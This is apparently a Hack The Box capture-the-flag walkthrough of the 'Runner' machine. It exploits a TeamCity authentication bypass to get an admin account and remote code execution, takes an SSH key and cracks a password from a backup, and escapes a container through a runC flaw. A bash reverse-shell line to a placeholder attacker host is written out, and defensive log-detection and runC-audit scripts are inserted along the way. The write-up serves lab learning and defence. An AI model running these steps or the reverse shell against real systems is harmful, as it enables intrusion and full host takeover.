# HTB Season 5: Runner Machine Walkthrough

I ran Threader3000 first, which identified ports 22, 80 and 8000 as open. Following this, I ran an Nmap scan:

<figure><img src="/files/syTILBP2WqhZxc2QqzvN" alt=""><figcaption><p>Result of the Nmap scan</p></figcaption></figure>

The web server running on port 80:

<figure><img src="/files/HFB7sV3BHJdVFwbpvsIf" alt=""><figcaption><p>Landing Page</p></figcaption></figure>

Checking the source code and performing dirbusting revealed no leads. The service on port 8000 returned ‘Not found’ when visited. So, the next thing I tried was looking for virtual hosts on `runner.htb` using `ffuf`. It took some time, but I ultimately got something useful:

<figure><img src="/files/4sda5dJdTsbkgjExLcUr" alt=""><figcaption><p>Discovering a virtual host</p></figcaption></figure>

> TeamCity is a continuous integration (CI) server provided by JetBrains.

Here we had a login with the version of the service mentioned below:

<figure><img src="/files/5pAhJ2C97DiC0fv8fgd6" alt=""><figcaption><p>teamcity.runner.htb</p></figcaption></figure>

I tried default passwords even though I was almost certain they wouldn’t work, but it’s best to be sure you’ve tried everything. Next, knowing the version, I started looking for exploits.

> CVE-2023–42793: In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible.\
> Read more about this product and CVE [here](https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity).

***

Using this CVE, we could do two things — either create an admin account of our own or use the existing admin account to obtain arbitrary code execution. I took the former route during the season after going down the RCE path and failing, but later I found the correct way of obtaining RCE, so I’ll be covering both approaches here.

#### **1. Creating an Additional Admin Account**

I found [this](https://github.com/H454NSec/CVE-2023-42793) public exploit, and it successfully created an admin account for our instance of TeamCity:

<figure><img src="/files/EJXejIqoKHMTp07pOcfZ" alt=""><figcaption></figcaption></figure>

After logging in, under the `Administration` tab there is an interesting feature — Backup. After performing one and downloading it, I looked for interesting strings. From the Admin panel, we can also see other users, like john, who is the actual admin, and matthew. I searched for those names in the backup:

<figure><img src="/files/jkvvJkvSjlvJBmQUHX1L" alt=""><figcaption><p>Credentials</p></figcaption></figure>

Wait, that’s not all.

<figure><img src="/files/1akKuljZQxsdze75KFD3" alt=""><figcaption><p>SSH Key</p></figcaption></figure>

There’s an SSH private key. I was able to use it to log into john’s account and grab the first flag.

#### **2. Using the Admin Account for RCE**

In the [blog mentioned earlier](https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity), there are steps given to obtain an access token and execute code. I followed those and got here:

<figure><img src="/files/AWMiAQIe57z6lDVo7GRM" alt=""><figcaption><p>RCE</p></figcaption></figure>

The next thing to try was definitely obtaining a reverse shell. However, none of the reverse shells I injected worked. I believe there was an issue with the URL encoding, because even multi-word commands like `ls -al` were throwing errors in my case.

I decided to research some more, and that’s when I found [this](https://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html) blog post, which enlightened me that there’s [this Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb) for this CVE. Several hours later, I was still unable to get this module to run. Then I found just what I was looking for — an [exploit](https://github.com/hotplugin0x01/CVE-2023-42793/blob/main/exploit.py) in Python, and answers as to why my Burp request hadn’t worked!

Turns out, for multi-word commands, we need to add the `params` parameter in addition to `exePath` to the request shown above. The exploit does the whole process for us; all I had to do was edit the reverse shell payload for a better shell, and I got a remote connection.

{% code overflow="wrap" %}

```
bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1
# replace attacker_ip and attacker_port with your listener's address and port
```

{% endcode %}
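From the defender's side, the two requests the write-up relies on (creating an access token through the authentication bypass, then calling the debug endpoint with `exePath` and `params`) leave a distinctive trail in the web server log. The following script is an added example, not code from the write-up or from any of the exploit repositories linked above; it scans constructed Common Log Format lines for those patterns. The request paths it matches (`/app/rest/users/…/tokens/RPC2` and `/app/rest/debug/processes`) are taken from the public advisories for CVE-2023-42793 rather than from this page, and the log lines, addresses and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format), such as a reverse proxy
# in front of TeamCity might record. Addresses, times and paths are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Jul/2024:10:01:02 +0000] "GET /login.html HTTP/1.1" 200 5120
203.0.113.10 - - [27/Jul/2024:10:01:07 +0000] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 204 0
203.0.113.10 - - [27/Jul/2024:10:01:08 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 212
203.0.113.10 - - [27/Jul/2024:10:01:15 +0000] "POST /app/rest/debug/processes?exePath=/bin/sh&params=-c&params=id HTTP/1.1" 200 80
198.51.100.7 - - [27/Jul/2024:10:02:00 +0000] "GET /app/rest/server HTTP/1.1" 200 930
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Parse one CLF line into a dict with the path and query split out; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return a list of finding labels for one parsed request."""
    findings = []
    # The bypass works by appending /RPC2 to an otherwise authenticated REST path (public
    # advisory detail, not from the write-up); token management under /app/rest/users is
    # the strongest signal, any other /RPC2 suffix is a weaker one worth reviewing.
    if rec["path"].endswith("/RPC2") and "/app/rest/users/" in rec["path"] and "/tokens/" in rec["path"]:
        findings.append("token-bypass")
    elif rec["path"].endswith("/RPC2"):
        findings.append("rpc2-suffix")
    # The debug endpoint with exePath (plus repeated params for multi-word commands,
    # as the write-up explains) is the code-execution step; reassemble the command line.
    if rec["path"].endswith("/app/rest/debug/processes") and "exePath" in rec["query"]:
        cmd = " ".join(rec["query"]["exePath"] + rec["query"].get("params", []))
        findings.append(f"debug-process-exec: {cmd}")
    return findings


def scan(log_text):
    """Return {client_ip: [findings]} for every client with at least one finding."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        found = classify(rec)
        if found:
            hits.setdefault(rec["ip"], []).extend(found)
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG).items():
        print(ip)
        for f in findings:
            print("  -", f)
```

A DELETE immediately followed by a POST on the same `tokens/RPC2` path from one client, as in the constructed sample, is the shape of the public exploit chain and is a good trigger for an alert; the reconstructed command line from the debug endpoint tells the responder what was actually run.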

Then following a similar process as the first approach, we can look for interesting files and strings.

<figure><img src="/files/wDOyMJL0Lt0NFELutUiX" alt=""><figcaption><p>Finding the SSH Key from Reverse Shell</p></figcaption></figure>

***

Now, we move to privilege escalation.

Sending the LinPEAS script to the target and running it:

{% code overflow="wrap" %}

```
scp -i ./HTB/runner/TeamCity_Backup_20240603_155101/config/projects/AllProjects/pluginData/ssh_keys/id_rsa linpeas.sh john@runner.htb:~
```

{% endcode %}

Since the output is usually large, I save it to a text file to examine on my system. You need to be quick, because the machine gets cleaned up at short intervals, deleting all downloaded files. Launch the LinPEAS script with the `-q` and `-N` flags to obtain a shorter, more readable output.

There’s Portainer on the system:

<figure><img src="/files/ZLa4CaQ8BY50udQcGJyH" alt=""><figcaption></figcaption></figure>

Search for that term and we have a lead:

<figure><img src="/files/1F0EABUvpdLdoiq2Y99Y" alt=""><figcaption><p>Finding another VHost on the system</p></figcaption></figure>

<figure><img src="/files/oxQTJL5LsrvGx2wF2knn" alt=""><figcaption></figcaption></figure>

> Portainer is a container management platform that can be used for deployment, efficient monitoring, and secure operations

The first thing we need is credentials, and we do have two unused password hashes from the TeamCity backup (check the screenshot). I used John the Ripper in bcrypt mode (the hash format is shown as bcrypt in the same screenshot) and was able to crack one of the hashes to obtain the password:

<figure><img src="/files/RoniS11wX3d5J68AWnRQ" alt=""><figcaption><p>Successful cracking of matthew’s password</p></figcaption></figure>

Using `matthew:piper123`, we can successfully log into the Portainer dashboard. There are two images available — teamcity and ubuntu. After going through the basic functionalities of the dashboard, I looked up vulnerabilities for this version of Portainer but didn’t find anything for privilege escalation.

Then I started reading about container escapes and tried to apply the methods given in the HackTricks guide. However, I wasn’t able to find a vector. I decided to refer to the official HTB forum for a nudge, and from there I found [this](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd) blog. It was about a specific version of `runC`.

> runC is a container runtime that provides a low-level interface for creating and running containers

On the system as john, I confirmed that we had the specific version of `runC` to apply the exploit:

<figure><img src="/files/Haze6H4Wy6bXGwUpoHFJ" alt=""><figcaption><p>Vulnerable Versions Range from v1.0.0-rc93 to 1.1.11, and ours is 1.1.7</p></figcaption></figure>

We can proceed with the exploitation steps. I created a container from the teamcity image, using its image ID, and set the working directory as instructed:

<figure><img src="/files/DBhJ6LEzJwP2qz9RlQaO" alt=""><figcaption></figcaption></figure>

Once the container was made and launched, I opened the console and moved to the root directory to get the final flag:

<figure><img src="/files/QFfMFntcYmixs1x5Mygo" alt=""><figcaption><p>Exploit in action</p></figcaption></figure>

In spite of the error about the directory we specified not being found, our command executed successfully and we were able to break out of the container and access the host filesystem. [This](https://medium.com/@sk3pper/play-with-cve-2024-21626-2b4377e9577f) is another article that I found very informative for understanding this vulnerability. It actually covers the scenario of this machine as well.
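Two things an administrator can check for on a host like this one are the installed `runC` version against the range quoted in the caption above (v1.0.0-rc93 through 1.1.11), and container definitions whose working directory or command points into `/proc/self/fd`, which is the precondition the write-up sets up through the Portainer form. The script below is an added example, not code from the write-up or from the linked articles; it parses the first line of `runc --version` output and audits a constructed `docker inspect`-style JSON document. The version strings and the container records are made up, and the `Entrypoint`/`Cmd` check for the same path prefix is included because the public advisory for CVE-2024-21626 describes that variant as well; that detail is not from this page.

```python
import json
import re

# Vulnerable range as quoted in the screenshot caption: v1.0.0-rc93 up to and including 1.1.11.
# A release candidate sorts before the final release of the same version, so the tuple's
# fourth element is the rc number, with infinity standing in for a final release.
VULN_LOW = (1, 0, 0, 93)
VULN_HIGH = (1, 1, 11, float("inf"))

_VER_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?")
# Matches /proc/self/fd and anything beneath it, whether absolute or embedded in a longer path.
_PROC_FD_RE = re.compile(r"(^|/)proc/self/fd(/|$)")


def parse_version(text):
    """Turn 'runc version 1.1.7' or '1.0.0-rc93' into a comparable tuple; None if absent."""
    m = _VER_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else float("inf"))


def is_vulnerable_runc(version_output):
    """True if the first line of `runc --version` output falls inside the vulnerable range."""
    first_line = version_output.splitlines()[0] if version_output else ""
    v = parse_version(first_line)
    if v is None:
        raise ValueError("could not parse runc version from: %r" % first_line)
    return VULN_LOW <= v <= VULN_HIGH


def audit_containers(inspect_json):
    """Return [(container name, reason)] for containers whose config reaches into /proc/self/fd."""
    findings = []
    for c in json.loads(inspect_json):
        cfg = c.get("Config") or {}
        name = c.get("Name", "?")
        wd = cfg.get("WorkingDir") or ""
        if _PROC_FD_RE.search(wd):
            findings.append((name, "WorkingDir=" + wd))
        for key in ("Entrypoint", "Cmd"):
            for arg in cfg.get(key) or []:
                if _PROC_FD_RE.search(arg):
                    findings.append((name, "%s contains %s" % (key, arg)))
    return findings


# Constructed sample: a benign container and one whose working directory is set the way the
# write-up describes. Names and paths are made up for this example.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/teamcity", "Config": {"WorkingDir": "/opt/app", "Cmd": ["/bin/sh"]}},
    {"Name": "/suspicious", "Config": {"WorkingDir": "/proc/self/fd/8", "Cmd": ["sh"]}},
])

if __name__ == "__main__":
    print("runc 1.1.7 vulnerable:", is_vulnerable_runc("runc version 1.1.7"))
    for name, reason in audit_containers(SAMPLE_INSPECT):
        print("flagged", name, reason)
```

On a real host, feed `is_vulnerable_runc` the output of `runc --version` and `audit_containers` the output of `docker inspect $(docker ps -aq)`; a hit on the second check is worth treating as an exploitation attempt rather than a misconfiguration, since no legitimate workload needs a working directory under `/proc/self/fd`.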

***

This was a very informative machine for me as it provided not just multiple CVEs but also several paths to exploit them. I have very limited experience with containers so it gave me an opportunity to learn about vulnerabilities in them and what to look out for.

Thanks for reading!

<mark style="color:$info;">\[Originally Published on Jul 27, 2024]</mark>
